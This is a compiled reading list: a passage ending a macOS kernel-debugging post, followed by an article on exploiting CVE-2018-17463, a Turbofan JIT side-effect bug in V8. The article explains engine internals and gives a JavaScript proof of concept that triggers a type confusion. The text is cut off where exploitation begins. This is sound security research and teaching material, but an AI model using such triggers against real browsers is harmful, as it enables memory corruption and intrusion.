    Starting with Apple’s adoption of LLVM with Xcode 3.2, GDB was eventually replaced by LLDB as the debugger of choice for macOS and its kernel. Analogously to the old kgmacros for GDB, since at least macOS 10.8 and XNU 2050.7.9 Apple has been releasing the so-called lldbmacros, a set of Python scripts that extend LLDB’s capabilities with helpful commands and macros for kernel debugging. Examples of these commands are allproc (to print procinfo for each process structure), pmap_walk (to perform a page-table walk for a virtual address) and showallkmods (for a summary of all loaded kexts).

    Limitations of the available tools

    The combination of KDP and LLDB, along with the notable introspection possibilities offered by lldbmacros, makes for a great kernel debugger; still, at present this approach has a few annoyances and drawbacks, summarised here.

    First, as already noted, the KDP stub in the kernel is activated only after setting the debug boot-arg in the non-volatile RAM, an operation which requires disabling SIP. Secondly, the whole debugging procedure has many side effects: the modification of global variables (like kdp_flag); the value of the kernel base address written at a fixed memory location; the alteration of kernel code with 0xCC software breakpoints [88][89] (watchpoints are not supported). All of these (and others) can easily be detected by drivers, rootkits and exploits by reading NVRAM or global variables, or with code checksums. Thirdly, the remote debugger cannot stop the execution of the kernel once it has been resumed: the only way to return to the debugger is to wait for a breakpoint to be hit (or to generate a trap by, for example, injecting an NMI with dtrace from inside the debuggee). Fourthly, debugging can obviously start only after the initialisation of the KDP agent in the kernel, which happens relatively late in the startup phase and makes early debugging impossible. Finally, being part of the Kernel Debug Kits, lldbmacros are unfortunately only available for a few macOS releases.

    Wrapping up

    With this post, we tried to document accurately how macOS kernel debugging works, in the hope of creating an up-to-date reference on the topic. In the next post, we will present our solution for a better macOS debugging experience, also intended to overcome the limitations of the current approach.


    Source: https://blog.quarkslab.com/an-overview-of-macos-kernel-debugging.html

  3. Title : Exploiting Logic Bugs in JavaScript JIT Engines
    Author : saelo
    Date : May 7, 2019
    |=-----------------------------------------------------------------------=|
    |=---------------=[       The Art of Exploitation       ]=---------------=|
    |=-----------------------------------------------------------------------=|
    |=----------------=[ Compile Your Own Type Confusions ]=-----------------=|
    |=---------=[ Exploiting Logic Bugs in JavaScript JIT Engines ]=---------=|
    |=-----------------------------------------------------------------------=|
    |=----------------------------=[ saelo ]=--------------------------------=|
    |=-----------------------=[ phrack@saelo.net ]=--------------------------=|
    |=-----------------------------------------------------------------------=|
    
    
    --[ Table of contents
    
    0 - Introduction
    1 - V8 Overview
        1.1 - Values
        1.2 - Maps
        1.3 - Object Summary
    2 - An Introduction to Just-in-Time Compilation for JavaScript
        2.1 - Speculative Just-in-Time Compilation
        2.2 - Speculation Guards
        2.3 - Turbofan
        2.4 - Compiler Pipeline
        2.5 - A JIT Compilation Example
    3 - JIT Compiler Vulnerabilities
        3.1 - Redundancy Elimination
        3.2 - CVE-2018-17463
    4 - Exploitation
        4.1 - Constructing Type Confusions
        4.2 - Gaining Memory Read/Write
        4.3 - Reflections
        4.4 - Gaining Code Execution
    5 - References
    6 - Exploit Code
    
    
    --[ 0 - Introduction
    
    This article strives to give an introduction to just-in-time (JIT)
    compiler vulnerabilities, using as an example CVE-2018-17463, a bug found
    through source code review and used as part of the hack2win [1] competition
    in September 2018. The vulnerability was afterwards patched by Google with
    commit 52a9e67a477bdb67ca893c25c145ef5191976220 "[turbofan] Fix
    ObjectCreate's side effect annotation" and the fix was made available to
    the public on October 16th with the release of Chrome 70.
    
    Source code snippets in this article can also be viewed online in the
    source code repositories as well as on code search [2]. The exploit was
    tested on chrome version 69.0.3497.81 (64-bit), corresponding to v8 version
    6.9.427.19.
    
    
    --[ 1 - V8 Overview
    
    V8 is Google's open source JavaScript engine and is used to power, among
    others, Chromium-based web browsers. It is written in C++ and commonly used
    to execute untrusted JavaScript code. As such, it is an interesting piece of
    software for attackers.
    
    V8 features numerous pieces of documentation, both in the source code and
    online [3]. Furthermore, v8 has multiple features that facilitate
    exploring its inner workings:
    
        0. A number of builtin functions usable from JavaScript, enabled
        through the --enable-natives-syntax flag for d8 (v8's JavaScript
        shell). These e.g. allow the user to inspect an object via
        %DebugPrint, to trigger garbage collection with %CollectGarbage, or to
        force JIT compilation of a function through %OptimizeFunctionOnNextCall.
    
        1. Various tracing modes, also enabled through command-line flags, which
        cause logging of numerous engine internal events to stdout or a log
        file. With these, it becomes possible to e.g. trace the behavior of
        different optimization passes in the JIT compiler.
    
        2. Miscellaneous tools in the tools/ subdirectory such as a visualizer
        of the JIT IR called turbolizer.
    
    --[ 1.1 - Values
    
    As JavaScript is a dynamically typed language, the engine must store type
    information with every runtime value. In v8, this is accomplished through a
    combination of pointer tagging and the use of dedicated type information
    objects, called Maps.
    
    The different JavaScript value types in v8 are listed in src/objects.h, of
    which an excerpt is shown below.
    
        // Inheritance hierarchy:
        // - Object
        //   - Smi          (immediate small integer)
        //   - HeapObject   (superclass for everything allocated in the heap)
        //     - JSReceiver  (suitable for property access)
        //       - JSObject
        //     - Name
        //       - String
        //     - HeapNumber
        //     - Map
        //     ...
    
    A JavaScript value is then represented as a tagged pointer of static type
    Object*. On 64-bit architectures, the following tagging scheme is used:
    
        Smi:        [32 bit signed int] [31 bits unused] 0
        HeapObject: [64 bit direct pointer]            | 01
    
    As such, the pointer tag differentiates between Smis and HeapObjects. All
    further type information is then stored in a Map instance to which a
    pointer can be found in every HeapObject at offset 0.
    
    With this pointer tagging scheme, arithmetic or binary operations on Smis
    can often ignore the tag as the lower 32 bits will be all zeroes. However,
    dereferencing a HeapObject requires masking off the least significant bit
    (LSB) first. For that reason, all accesses to data members of a HeapObject
    have to go through special accessors that take care of clearing the LSB. In
    fact, Objects in v8 do not have any C++ data members, as access to those
    would be impossible due to the pointer tag. Instead, the engine stores data
    members at predefined offsets in an object through the aforementioned accessor
    functions. In essence, v8 thus defines the in-memory layout of Objects
    itself instead of delegating this to the compiler.
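    As an illustration, the decoding rules implied by this scheme can be written down in a few lines of BigInt arithmetic (a sketch of the logic only, not v8 code):

```javascript
// Decode a 64-bit tagged word according to the scheme above (illustrative).
function decodeTaggedValue(word) {  // word is a BigInt
  if ((word & 1n) === 0n) {
    // Smi: the signed 32-bit payload lives in the upper half of the word.
    return { kind: 'smi', value: BigInt.asIntN(32, word >> 32n) };
  }
  // HeapObject: a direct pointer with the low bit set as a tag; mask it
  // off before dereferencing, as v8's accessor functions do internally.
  return { kind: 'heapobject', address: word & ~1n };
}
```

    For example, the word 0x0000004100000000 decodes to the Smi 0x41, while a word like 0x000023adbcd8c751 decodes to a HeapObject pointer to 0x23adbcd8c750.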
    
    ----[ 1.2 - Maps
    
    The Map is a key data structure in v8, containing information such as
    
    * The dynamic type of the object, i.e. String, Uint8Array, HeapNumber, ...
    * The size of the object in bytes
    * The properties of the object and where they are stored
    * The type of the array elements, e.g. unboxed doubles or tagged pointers
    * The prototype of the object if any
    
    While the property names are usually stored in the Map, the property values
    are stored with the object itself in one of several possible regions. The
    Map then provides the exact location of the property value in the
    respective region.
    
    In general there are three different regions in which property values can
    be stored: inside the object itself ("inline properties"), in a separate,
    dynamically sized heap buffer ("out-of-line properties"), or, if the
    property name is an integer index [4], as array elements in a
    dynamically-sized heap array. In the first two cases, the Map will store
    the slot number of the property value while in the last case the slot
    number is the element index. This can be seen in the following example:
    
        let o1 = {a: 42, b: 43};
        let o2 = {a: 1337, b: 1338};
    
    After execution, there will be two JSObjects and one Map in memory:
    
                          +----------------+
                          |                |
                          | map1           |
                          |                |
                          | property: slot |
                          |      .a : 0    |
                          |      .b : 1    |
                          |                |
                          +----------------+
                              ^         ^
        +--------------+      |         |
        |              +------+         |
        |    o1        |           +--------------+
        |              |           |              |
        | slot : value |           |    o2        |
        |    0 : 42    |           |              |
        |    1 : 43    |           | slot : value |
        +--------------+           |    0 : 1337  |
                                   |    1 : 1338  |
                                   +--------------+
    
    As Maps are relatively expensive objects in terms of memory usage, they are
    shared as much as possible between "similar" objects. This can be seen in
    the previous example, where both o1 and o2 share the same Map, map1.
    However, if a third property .c (e.g. with value 1339) is added to o1, then
    the Map can no longer be shared as o1 and o2 now have different properties.
    As such, a new Map is created for o1:
    
           +----------------+       +----------------+
           |                |       |                |
           | map1           |       | map2           |
           |                |       |                |
           | property: slot |       | property: slot |
           | .a      : 0    |       | .a      : 0    |
           | .b      : 1    |       | .b      : 1    |
           |                |       | .c      : 2    |
           +----------------+       +----------------+
                   ^                        ^
                   |                        |
                   |                        |
            +--------------+         +--------------+
            |              |         |              |
            |    o2        |         |    o1        |
            |              |         |              |
            | slot : value |         | slot : value |
            |    0 : 1337  |         |    0 : 1337  |
            |    1 : 1338  |         |    1 : 1338  |
            +--------------+         |    2 : 1339  |
                                     +--------------+
    
    If later on the same property .c were added to o2 as well, then both objects
    would again share map2. This works efficiently because each Map keeps track
    of which new Map an object should be transitioned to when a property
    of a certain name (and possibly type) is added to it. This data structure
    is commonly called a transition table.
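    A toy model of this sharing mechanism can be written in a few lines of JavaScript (all names here are illustrative and do not correspond to v8 internals):

```javascript
// Toy model of Map sharing via transition tables (illustrative only).
class Shape {
  constructor(parent, name) {
    // Property-name -> slot-number table, inherited from the parent shape.
    this.slots = parent
      ? { ...parent.slots, [name]: Object.keys(parent.slots).length }
      : {};
    this.transitions = new Map();  // property name -> next Shape
  }
  transition(name) {
    // Reuse a recorded transition so that objects built with the same
    // property order end up sharing a single Shape.
    if (!this.transitions.has(name)) {
      this.transitions.set(name, new Shape(this, name));
    }
    return this.transitions.get(name);
  }
}

const root = new Shape(null, null);
```

    With this model, root.transition('a').transition('b') returns the same Shape object every time it is computed, mirroring how o1 and o2 share map1 above, while adding a further property .c yields a new, distinct Shape playing the role of map2.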
    
    V8 is, however, also capable of storing the properties as a hash map
    instead of using the Map and slot mechanism, in which case the property
    name is directly mapped to the value. This is used in cases when the engine
    believes that the Map mechanism will induce additional overhead, such as
    e.g. in the case of singleton objects.
    
    The Map mechanism is also essential for garbage collection: when the
    collector processes an allocation (a HeapObject), it can immediately
    retrieve information such as the object's size and whether the object
    contains any other tagged pointers that need to be scanned by inspecting
    the Map.
    
    ----[ 1.3 - Object Summary
    
    Consider the following code snippet
    
    	let obj = {
    	  x: 0x41,
    	  y: 0x42
    	};
    	obj.z = 0x43;
    	obj[0] = 0x1337;
    	obj[1] = 0x1338;
    
    After execution in v8, inspecting the memory address of the object shows:
    
    	(lldb) x/5gx 0x23ad7c58e0e8
        0x23ad7c58e0e8: 0x000023adbcd8c751 0x000023ad7c58e201
        0x23ad7c58e0f8: 0x000023ad7c58e229 0x0000004100000000
        0x23ad7c58e108: 0x0000004200000000
    
        (lldb) x/3gx 0x23ad7c58e200
        0x23ad7c58e200: 0x000023adafb038f9 0x0000000300000000
        0x23ad7c58e210: 0x0000004300000000
    
        (lldb) x/6gx 0x23ad7c58e228
        0x23ad7c58e228: 0x000023adafb028b9 0x0000001100000000
        0x23ad7c58e238: 0x0000133700000000 0x0000133800000000
        0x23ad7c58e248: 0x000023adafb02691 0x000023adafb02691
        ...
    
    First is the object itself which consists of a pointer to its Map
    (0x23adbcd8c751), the pointer to its out-of-line properties
    (0x23ad7c58e201), the pointer to its elements (0x23ad7c58e229), and the two
    inline properties (x and y). Inspecting the out-of-line properties pointer
    shows another object that starts with a Map (which indicates that this is a
    FixedArray) followed by the size and the property z. The elements array
    again starts with a pointer to the Map, followed by the capacity, followed
    by the two elements at indices 0 and 1, and 9 further elements set to the
    magic value "the_hole" (indicating that the backing memory has been
    overcommitted). As can be seen, all values are stored as tagged pointers.
    If further objects were created in the same fashion, they would reuse the
    existing Map.
    
    
    --[ 2 - An Introduction to Just-in-Time Compilation for JavaScript
    
    Modern JavaScript engines typically employ an interpreter and one or
    multiple just-in-time compilers. As a unit of code is executed more
    frequently, it is moved to higher tiers which are capable of executing the
    code faster, although their startup time is usually higher as well.
    
    The next section aims to give an intuitive introduction rather than a
    formal explanation of how JIT compilers for dynamic languages such as
    JavaScript manage to produce optimized machine code from a script.
    
    ----[ 2.1 - Speculative Just-in-Time Compilation
    
    Consider the following two code snippets. How could each of them be
    compiled to machine code?
    
        // C++
        int add(int a, int b) {
            return a + b;
        }
    
        // JavaScript
        function add(a, b) {
            return a + b;
        }
    
    The answer seems rather clear for the first code snippet. After all, the
    types of the arguments as well as the ABI, which specifies the registers
    used for parameters and return values, are known. Further, the instruction
    set of the target machine is available. As such, compilation to machine
    code might produce the following x86_64 code:
    
        lea eax, [rdi + rsi]
        ret
    
    However, for the JavaScript code, type information is not known. As such,
    it seems impossible to produce anything better than the generic add
    operation handler [5], which would only provide a negligible performance
    boost over the interpreter. As it turns out, dealing with missing type
    information is a key challenge to overcome for compiling dynamic languages
    to machine code. This can also be seen by imagining a hypothetical
    JavaScript dialect which uses static typing, for example:
    
        function add(a: Smi, b: Smi) -> Smi {
            return a + b;
        }
    
    In this case, it is again rather easy to produce machine code:
    
        lea     rax, [rdi+rsi]
        jo      bailout_integer_overflow
        ret
    
    This is possible because the lower 32 bits of a Smi will be all zeroes due
    to the pointer tagging scheme. This assembly code looks very similar to the
    C++ example, except for the additional overflow check, which is required
    since JavaScript does not know about integer overflows (in the
    specification all numbers are IEEE 754 double precision floating point
    numbers), but CPUs certainly do. As such, in the unlikely event of an
    integer overflow, the engine would have to transfer execution to a
    different, more generic execution tier like the interpreter. There it would
    repeat the failed operation and in this case convert both inputs to
    floating point numbers prior to adding them together. This mechanism is
    commonly called bailout and is essential for JIT compilers, as it allows
    them to produce specialized code which can always fall back to more generic
    code if an unexpected situation occurs.
    
    Unfortunately, for plain JavaScript the JIT compiler does not have the
    comfort of static type information. However, as JIT compilation only
    happens after several executions in a lower tier, such as the interpreter,
    the JIT compiler can use type information from previous executions. This,
    in turn, enables speculative optimization: the compiler will assume that a
    unit of code will be used in a similar way in the future and thus see the
    same types for e.g. the arguments. It can then produce optimized code like
    the one shown above assuming that the types will be used in the future.
    
    ----[ 2.2 - Speculation Guards
    
    Of course, there is no guarantee that a unit of code will always be used in
    a similar way. As such, the compiler must verify that all of its type
    speculations still hold at runtime before executing the optimized code.
    This is accomplished through a number of lightweight runtime checks,
    discussed next.
    
    By inspecting feedback from previous executions and the current engine
    state, the JIT compiler first formulates various speculations such as "this
    value will always be a Smi", or "this value will always be an object with a
    specific Map", or even "this Smi addition will never cause an integer
    overflow". Each of these speculations is then verified to still hold at
    runtime with a short piece of machine code, called a speculation guard. If
    the guard fails, it will perform a bailout to a lower execution tier such
    as the interpreter. Below are two commonly used speculation guards:
    
        ; Ensure is Smi
        test    rdi, 0x1
        jnz     bailout
    
        ; Ensure has expected Map
        cmp    QWORD PTR [rdi-0x1], 0x12345601
        jne    bailout
    
    The first guard, a Smi guard, verifies that some value is a Smi by checking
    that the pointer tag is zero. The second guard, a Map guard, verifies that
    a HeapObject in fact has the Map that it is expected to have.
    
    Using speculation guards, dealing with missing type information becomes:
    
        0. Gather type profiles during execution in the interpreter
    
        1. Speculate that the same types will be used in the future
    
        2. Guard those speculations with runtime speculation guards
    
        3. Afterwards, produce optimized code for the previously seen types
    
    In essence, inserting a speculation guard adds a piece of static type
    information to the code following it.
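    The guard-then-bail-out structure can be sketched in plain JavaScript (purely conceptual: real guards are emitted as machine code, and the generic handler's role is played by the interpreter):

```javascript
// Conceptual sketch of a specialized add protected by Smi speculation
// guards. genericAdd stands in for the interpreter's generic handler.
function makeSpecializedAdd(genericAdd) {
  return function add(a, b) {
    // "Smi guards": bail out unless both inputs are 32-bit integers.
    if ((a | 0) !== a || (b | 0) !== b) return genericAdd(a, b);
    const r = (a + b) | 0;
    // Overflow guard: the truncated result must equal the real sum.
    if (r !== a + b) return genericAdd(a, b);
    return r;  // fast path: plain integer addition
  };
}
```

    The fast path only ever executes when both guards pass, so the code after the guards can safely assume integer inputs; anything else falls back to the generic tier, just like a bailout.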
    
    ----[ 2.3 - Turbofan
    
    Even though an internal representation of the user's JavaScript code is
    already available in the form of bytecode for the interpreter, JIT
    compilers commonly convert the bytecode to a custom intermediate
    representation (IR) which is better suited for the various optimizations
    performed. Turbofan, the JIT compiler inside v8, is no exception. The IR
    used by turbofan is graph-based, consisting of operations (nodes) and
    different types of edges between them, namely
    
        * control-flow edges, connecting control-flow operations such as loops
          and if conditions
    
        * data-flow edges, connecting input and output values
    
        * effect-flow edges, which connect effectual operations such that they
          are scheduled correctly. For example: consider a store to a property
          followed by a load of the same property. As there is no data- or
          control-flow dependency between the two operations, effect-flow is
          needed to correctly schedule the store before the load.
    
    Further, the turbofan IR supports three different types of operations:
    JavaScript operations, simplified operations, and machine operations.
    Machine operations usually resemble a single machine instruction while JS
    operations resemble a generic bytecode instruction. Simplified operations
    are somewhere in between. As such, machine operations can directly be
    translated into machine instructions while the other two types of
    operations require further conversion steps to lower-level operations (a
    process called lowering). For example, the generic property load operations
    could be lowered to a CheckHeapObject and CheckMaps operation followed by a
    8-byte load from an inline slot of an object.
    
    A comfortable way to study the behavior of the JIT compiler in various
    scenarios is through v8's turbolizer tool [6]: a small web application that
    consumes the output produced by the --trace-turbo command line flag and
    renders it as an interactive graph.
    
    ----[ 2.4 - Compiler Pipeline
    
    Given the previously described mechanisms, a typical JavaScript JIT
    compiler pipeline then looks roughly as follows:
    
        0. Graph building and specialization: the bytecode as well as runtime
        type profiles from the interpreter are consumed and an IR graph,
        representing the same computations, is constructed. Type profiles are
        inspected and based on them speculations are formulated, e.g. about
        which types of values to see for an operation. The speculations are
        guarded with speculation guards.
    
        1. Optimization: the resulting graph, which now has static type
        information due to the guards, is optimized much like "classic"
        ahead-of-time (AOT) compilers do. Here an optimization is defined as a
        transformation of code that is not required for correctness but
        improves the execution speed or memory footprint of the code. Typical
        optimizations include loop-invariant code motion, constant folding,
        escape analysis, and inlining.
    
        2. Lowering: finally, the resulting graph is lowered to machine code
        which is then written into an executable memory region. From that point
        on, invoking the compiled function will result in a transfer of
        execution to the generated code.
    
    This structure is rather flexible though. For example, lowering could
    happen in multiple stages, with further optimizations in between them. In
    addition, register allocation has to be performed at some point, which is,
    however, also an optimization to some degree.
    
    ----[ 2.5 - A JIT Compilation Example
    
    This chapter is concluded with an example of the following function being
    JIT compiled by turbofan:
    
        function foo(o) {
            return o.b;
        }
    
    During parsing, the function would first be compiled to generic bytecode,
    which can be inspected using the --print-bytecode flag for d8. The output
    is shown below.
    
        Parameter count 2
        Frame size 0
           12 E> 0 : a0                StackCheck
           31 S> 1 : 28 02 00 00       LdaNamedProperty a0, [0], [0]
           33 S> 5 : a4                Return
        Constant pool (size = 1)
        0x1fbc69c24ad9: [FixedArray] in OldSpace
         - map: 0x1fbc6ec023c1 <Map>
         - length: 1
                   0: 0x1fbc69c24301 <String[1]: b>
    
    The function is mainly compiled to two operations: LdaNamedProperty, which
    loads property .b of the provided argument, and Return, which returns said
    property. The StackCheck operation at the beginning of the function guards
    against stack overflows by throwing an exception if the call stack size is
    exceeded. More information about v8's bytecode format and interpreter can
    be found online [7].
    
    To trigger JIT compilation, the function has to be invoked several times:
    
        for (let i = 0; i < 100000; i++) {
            foo({a: 42, b: 43});
        }
    
        /* Or by using a native after providing some type information: */
        foo({a: 42, b: 43});
        foo({a: 42, b: 43});
        %OptimizeFunctionOnNextCall(foo);
        foo({a: 42, b: 43});
    
    This will also populate the feedback vector of the function, which
    associates observed input types with bytecode operations. In this case, the
    feedback
    vector entry for the LdaNamedProperty would contain a single entry: the Map
    of the objects that were given to the function as argument. This Map will
    indicate that property .b is stored in the second inline slot.
    
    Once turbofan starts compiling, it will build a graph representation of the
    JavaScript code. It will also inspect the feedback vector and, based on
    that, speculate that the function will always be called with an object of a
    specific Map. Next, it guards these assumptions with two runtime checks,
    which will bail out to the interpreter if the assumptions ever turn out to
    be false, then proceeds to emit a property load for an inline property.
    The optimized graph will ultimately look similar to the one shown below.
    Here, only data-flow edges are shown.
    
            +----------------+
            |                |
            |  Parameter[1]  |
            |                |
            +-------+--------+
                    |                   +-------------------+
                    |                   |                   |
                    +------------------->  CheckHeapObject  |
                                        |                   |
                                        +----------+--------+
              +------------+                       |
              |            |                       |
              |  CheckMap  <-----------------------+
              |            |
              +-----+------+
                    |                   +------------------+
                    |                   |                  |
                    +------------------->  LoadField[+32]  |
                                        |                  |
                                        +----------+-------+
               +----------+                        |
               |          |                        |
               |  Return  <------------------------+
               |          |
               +----------+
    
    This graph will then be lowered to machine code similar to the following.
    
        ; Ensure o is not a Smi
        test    rdi, 0x1
        jz      bailout_not_object
    
        ; Ensure o has the expected Map
        cmp     QWORD PTR [rdi-0x1], 0xabcd1234
        jne     bailout_wrong_map
    
        ; Perform operation for object with known Map
        mov     rax, [rdi+0x1f]
        ret
    
    If the function were to be called with an object with a different Map, the
    second guard would fail, causing a bailout to the interpreter (more
    precisely to the LdaNamedProperty operation of the bytecode) and likely the
    discarding of the compiled code. Eventually, the function would be
    recompiled to take the new type feedback into account, this time
    performing a polymorphic property load (supporting more than one input
    type), e.g. by emitting code for the
    property load for both Maps, then jumping to the respective one depending
    on the current Map. If the operation becomes even more polymorphic, the
    compiler might decide to use a generic inline cache (IC) [8][9] for
    the polymorphic operation. An IC caches previous lookups but can always
    fall back to the runtime function for previously unseen input types without
    bailing out of the JIT code.
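
    The transition from monomorphic to polymorphic to generic handling
    described above can be observed with a small snippet. The following is
    an illustrative sketch (function and property names are made up; the
    exact transition thresholds are internal to the engine):

```javascript
// A property load site whose type feedback evolves as it sees more Maps.
function getX(o) {
    return o.x;
}

// Monomorphic: every call sees the same Map {x}.
for (let i = 0; i < 1000; i++) getX({x: i});

// Polymorphic: a second Map {x, y} is now seen at the same load site.
for (let i = 0; i < 1000; i++) getX({x: i, y: i});

// Megamorphic: many distinct Maps make per-Map fast paths impractical,
// so the engine might fall back to a generic inline cache for this load.
for (let i = 0; i < 20; i++) {
    let o = {};
    o['p' + i] = i;    // unique property name => unique Map
    o.x = i;
    getX(o);
}
```

    In d8, the --trace-ic flag can be used to observe the feedback state
    of the load changing over the course of these loops.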
    
    
    --[ 3 - JIT Compiler Vulnerabilities
    
    JavaScript JIT compilers are commonly implemented in C++ and as such are
    subject to the usual list of memory- and type-safety violations. These are
    not specific to JIT compilers and will thus not be discussed further.
    Instead, the focus will be put on bugs in the compiler which lead to
    incorrect machine code generation which can then be exploited to cause
    memory corruption.
    
    Besides bugs in the lowering phases [10][11] which often result in rather
    classic vulnerabilities like integer overflows in the generated machine
    code, many interesting bugs come from the various optimizations. There have
    been bugs in bounds-check elimination [12][13][14][15], escape analysis
    [16][17], register allocation [18], and others. Each optimization pass
    tends to yield its own kind of vulnerabilities.
    
    When auditing complex software such as JIT compilers, it is often a
    sensible approach to determine specific vulnerability patterns in advance
    and look for instances of them. This is also a benefit of manual code
    auditing: knowing that a particular type of bug usually leads to a simple,
    reliable exploit, this is what the auditor can look for specifically.
    
    As such, a specific optimization, namely redundancy elimination, will be
    discussed next, along with the type of vulnerability one can find there and
    a concrete vulnerability, CVE-2018-17463, accompanied with an exploit.
    
    ----[ 3.1 - Redundancy Elimination
    
    One popular class of optimizations aims to remove safety checks from the
    emitted machine code if they are determined to be unnecessary. As can be
    imagined, these are very interesting for the auditor as a bug in those will
    usually result in some kind of type confusion or out-of-bounds access.
    
    One instance of these optimization passes, often called "redundancy
    elimination", aims to remove redundant type checks. As an example, consider
    the following code:
    
        function foo(o) {
            return o.a + o.b;
        }
    
    Following the JIT compilation approach outlined in chapter 2, the following
    IR code might be emitted for it:
    
        CheckHeapObject o
        CheckMap o, map1
        r0 = Load [o + 0x18]
    
        CheckHeapObject o
        CheckMap o, map1
        r1 = Load [o + 0x20]
    
        r2 = Add r0, r1
        CheckNoOverflow
        Return r2
    
    The obvious issue here is the redundant second pair of CheckHeapObject and
    CheckMap operations. In that case it is clear that the Map of o can not
    change between the two CheckMap operations. The goal of redundancy
    elimination is thus to detect these types of redundant checks and remove
    all but the first one on the same control-flow path.
    
    However, certain operations can cause side-effects: observable changes to
    the execution context. For example, a Call operation invoking a user
    supplied function could easily cause an object's Map to change, e.g. by
    adding or removing a property. In that case, a seemingly redundant check is
    in fact required as the Map could change in between the two checks. As such
    it is essential for this optimization that the compiler knows about all
    effectful operations in its IR. Unsurprisingly, correctly predicting the
    side effects of IR operations can be quite hard due to the nature of the
    JavaScript language. Bugs related to incorrect side effect predictions thus
    appear from time to time and are typically exploited by tricking the
    compiler into removing a seemingly redundant type check, then invoking the
    compiled code such that an object of an unexpected type is used without a
    preceding type check. Some form of type confusion then follows.
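
    At the JavaScript level, such a hidden side effect can be triggered
    through any implicit callback. The following sketch (plain JS, the
    semantics are visible without JIT compilation) uses a user-defined
    valueOf to mutate an object's shape between two property accesses,
    illustrating why the second check is only redundant if the compiler
    can prove that no user code runs in between:

```javascript
let o = {x: 42};

function f(obj, n) {
    let first = obj.x;        // first access: Map check in JIT code
    let k = n + 1;            // ToPrimitive(n) may invoke user code...
    return first + obj.x + k; // ...so this second check is NOT redundant
}

// An argument whose conversion to a number changes o's Map as a side
// effect, exactly the kind of effect the compiler must model correctly.
const evil = {
    valueOf() {
        delete o.x;           // shape change between the two accesses
        return 0;
    }
};

f(o, evil);                   // second obj.x is undefined => NaN
```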
    
    Vulnerabilities related to incorrect side-effect modeling can usually be
    found by locating IR operations which are assumed side-effect free by the
    engine, then verifying whether they really are side-effect free in all
    cases. This is how CVE-2018-17463 was found.
    
    ----[ 3.2 CVE-2018-17463
    
    In v8, IR operations have various flags associated with them. One of them,
    kNoWrite, indicates that the engine assumes that an operation will not have
    observable side-effects: it does not "write" to the effect chain. An
    example for such an operation was JSCreateObject, shown below:
    
        #define CACHED_OP_LIST(V)                                            \
          ...                                                                \
          V(CreateObject, Operator::kNoWrite, 1, 1)                          \
          ...
    
    To determine whether an IR operation might have side-effects it is often
    necessary to look at the lowering phases which convert high-level
    operations, such as JSCreateObject, into lower-level instructions and
    eventually machine instructions. For JSCreateObject, the lowering happens
    in js-generic-lowering.cc, responsible for lowering JS operations:
    
        void JSGenericLowering::LowerJSCreateObject(Node* node) {
          CallDescriptor::Flags flags = FrameStateFlagForCall(node);
          Callable callable = Builtins::CallableFor(
              isolate(), Builtins::kCreateObjectWithoutProperties);
          ReplaceWithStubCall(node, callable, flags);
        }
    
    In plain English, this means that a JSCreateObject operation will be
    lowered to a call to the runtime function CreateObjectWithoutProperties.
    This function in turn ends up calling ObjectCreate, another builtin but
    this time implemented in C++. Eventually, control flow ends up in
    JSObject::OptimizeAsPrototype. This is interesting as it seems to imply
    that the prototype object may potentially be modified during said
    optimization, which could be an unexpected side-effect for the JIT
    compiler. The following code snippet can be run to check whether
    OptimizeAsPrototype modifies the object in some way:
    
        let o = {a: 42};
        %DebugPrint(o);
        Object.create(o);
        %DebugPrint(o);
    
    Indeed, running it with `d8 --allow-natives-syntax` shows:
    
        DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
        - map: 0x0344c6f02571 <Map(HOLEY_ELEMENTS)> [FastProperties]
        ...
    
        DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
        - map: 0x0344c6f0d6d1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]
    
    As can be seen, the object's Map has changed when becoming a prototype so
    the object must have changed in some way as well. In particular, when
    becoming a prototype, the out-of-line property storage of the object was
    converted to dictionary mode. As such the pointer at offset 8 from the
    object will no longer point to a PropertyArray (all properties one after
    each other, after a short header), but instead to a NameDictionary (a more
    complex data structure directly mapping property names to values without
    relying on the Map). This certainly is a side effect and in this case an
    unexpected one for the JIT compiler. The reason for the Map change is that
    in v8, prototype Maps are never shared due to clever optimization tricks in
    other parts of the engine [19].
    
    At this point it is time to construct a first proof-of-concept for the bug.
    The requirements to trigger an observable misbehavior in a compiled
    function are:
    
        0. The function must receive an object that is not currently used as a
        prototype.
    
        1. The function needs to perform a CheckMap operation so that
        subsequent ones can be eliminated.
    
        2. The function needs to call Object.create with the object as argument
        to trigger the Map transition.
    
        3. The function needs to access an out-of-line property. This will,
        after a CheckMap that will later be incorrectly eliminated, load the
        pointer to the property storage, then dereference it, believing that it
        is pointing to a PropertyArray even though it will point to a
        NameDictionary.
    
    The following JavaScript code snippet accomplishes this:
    
        function hax(o) {
            // Force a CheckMaps node.
            o.a;
    
            // Cause unexpected side-effects.
            Object.create(o);
    
            // Trigger type-confusion because CheckMaps node is removed.
            return o.b;
        }
    
        for (let i = 0; i < 100000; i++) {
            let o = {a: 42};
            o.b = 43;           // will be stored out-of-line.
            hax(o);
        }
    
    It will first be compiled to pseudo IR code similar to the following:
    
        CheckHeapObject o
        CheckMap o, map1
        Load [o + 0x18]
    
        // Changes the Map of o
        Call CreateObjectWithoutProperties, o
    
        CheckMap o, map1
        r1 = Load [o + 0x8]         // Load pointer to out-of-line properties
        r2 = Load [r1 + 0x10]       // Load property value
    
        Return r2
    
    Afterwards, the redundancy elimination pass will incorrectly remove the
    second Map check, yielding:
    
        CheckHeapObject o
        CheckMap o, map1
        Load [o + 0x18]
    
        // Changes the Map of o
        Call CreateObjectWithoutProperties, o
    
        r1 = Load [o + 0x8]
        r2 = Load [r1 + 0x10]
    
        Return r2
    
    When this JIT code is run for the first time, it will return a different
    value than 43, namely an internal field of the NameDictionary which
    happens to be located at the same offset as the .b property in the
    PropertyArray.
    
    Note that in this case, the JIT compiler tried to infer the type of the
    argument object at the second property load instead of relying on the type
    feedback and thus, assuming the Map wouldn't change after the first type
    check, produced a property load from a FixedArray instead of a
    NameDictionary.
    
    
    --[ 4 - Exploitation
    
    The bug at hand allows the confusion of a PropertyArray with a
    NameDictionary. Interestingly, the NameDictionary still stores the property
    values inside a dynamically sized inline buffer of (name, value, flags)
    triples. As such, there likely exists a pair of properties P1 and P2 such
    that both P1 and P2 are located at offset O from the start of either the
    PropertyArray or the NameDictionary respectively. This is interesting for
    reasons explained in the next section. Shown next is the memory dump of the
    PropertyArray and NameDictionary for the same properties side by side:
    
        let o = {inline: 42};
